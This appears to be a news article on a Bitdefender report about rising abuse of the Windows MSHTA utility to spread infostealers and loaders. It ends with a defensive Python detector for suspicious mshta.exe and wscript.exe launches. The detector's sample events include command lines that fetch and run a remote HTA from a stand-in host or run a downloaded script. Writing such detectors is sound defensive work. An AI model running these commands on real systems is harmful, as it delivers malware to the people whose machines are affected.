- Bitdefender is reporting increasing misuse of the old MSHTA utility to spread information-stealing and loading malware.
- Campaigns range from simple commodity threats like LummaStealer to advanced persistence tools like PurpleFox.
- Defenders are advised to restrict outdated scripting utilities and deploy layered security controls to detect malicious scripting activity.
Cybercriminals are increasingly using an old, legitimate Windows tool to deploy information-stealing and loading malware, researchers say.
A new Bitdefender report claims that since the start of 2026 there has been an uptick in activity involving Microsoft HTML Application Host (MSHTA), a legitimate Windows utility that runs special HTML Application files known as HTA files.
While normal web pages are opened in a browser, HTA files interact directly with the Windows operating system and can execute scripts with elevated privileges.
Simple and complex threats
MSHTA is an old tool originally designed for light office and administrative tasks, but, like many other legitimate built-in tools, it is misused to run malicious scripts, download malware, or bypass security controls.
“Since the beginning of the year, we have seen an increase in MSHTA-related activities,” Bitdefender said. “As legitimate use of this utility is gradually fading, this trend likely reflects an increase in malicious activity rather than new administrative adoption.”
The activity analyzed by the researchers spans multiple categories of malware, they further explained, saying they saw both simple and more complex campaigns. On the “simpler” side, MSHTA is widely used to deliver infostealers such as Amatera or LummaStealer. It is also used for loaders such as CountLoader or Emmenhtal.
When it comes to more advanced and persistent threats, Bitdefender has seen crooks deploy ClipBanker and PurpleFox.
“This range of abuse demonstrates why MSHTA continues to be important to defenders: it is not a single malware family or intrusion model,” they explained. “It remains useful in everything from opportunistic malware distribution to long-term compromise.”
To defend against MSHTA-based attacks, organizations must ensure both user awareness and multi-layered security controls, the report says. Users should avoid downloading untrusted files or running suspicious commands, while organizations should deploy security tools that can detect malicious scripts or command-line abuse.
The company also recommends restricting utilities such as mshta.exe and wscript.exe when possible and replacing outdated scripting tools with modern alternatives to reduce the attack surface.
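As an added example (not code from Bitdefender's report or from TechRadar), the following Python shows the kind of command-line check the recommendation describes: it flags process-creation records in which mshta.exe or wscript.exe is handed remote or inline content, or is spawned by a parent where a script host is not expected. The record format, the sample events, the set of script hosts and the list of suspicious parents are all constructed assumptions for this example.

```python
import re

# Script hosts the report recommends restricting; the exact set is an assumption here.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe"}
# Parent processes from which a script-host launch is not expected (assumed list).
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
# Remote content (HTTP(S) URL or UNC path) or inline script passed on the command line.
REMOTE_OR_INLINE = re.compile(r"https?://|\\\\[^\\\s]+\\|javascript:|vbscript:", re.I)

# Constructed process-creation records in a simplified key=value;key=value form.
SAMPLE_EVENTS = [
    "ParentImage=C:\\Windows\\explorer.exe;Image=C:\\Windows\\System32\\mshta.exe;"
    "CommandLine=mshta.exe C:\\Tools\\inventory.hta",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE;"
    "Image=C:\\Windows\\System32\\mshta.exe;CommandLine=mshta https://example.invalid/update.hta",
    "ParentImage=C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE;"
    "Image=C:\\Windows\\System32\\wscript.exe;CommandLine=wscript.exe //B C:\\Users\\u\\Downloads\\invoice.js",
    "ParentImage=C:\\Windows\\explorer.exe;Image=C:\\Windows\\System32\\notepad.exe;"
    "CommandLine=notepad.exe",
]

def parse_event(line):
    """Split a key=value;key=value record into a dict (a simplification: no quoting rules)."""
    fields = {}
    for part in line.split(";"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]

def assess(event):
    """Return the reasons a record is suspicious; an empty list means no finding."""
    image = basename(event.get("Image", ""))
    if image not in SCRIPT_HOSTS:
        return []
    parent = basename(event.get("ParentImage", ""))
    command = event.get("CommandLine", "")
    reasons = []
    if REMOTE_OR_INLINE.search(command):
        reasons.append("remote URL or inline script passed to " + image)
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(image + " spawned by " + parent)
    if image == "mshta.exe" and not reasons:
        # Legitimate MSHTA use is fading, so any launch is worth a low-priority review.
        reasons.append("mshta.exe execution; legitimate use is rare, review")
    return reasons

def scan(lines):
    """Map record index to its reasons, keeping only records that produced a finding."""
    results = {i: assess(parse_event(line)) for i, line in enumerate(lines)}
    return {i: r for i, r in results.items() if r}
```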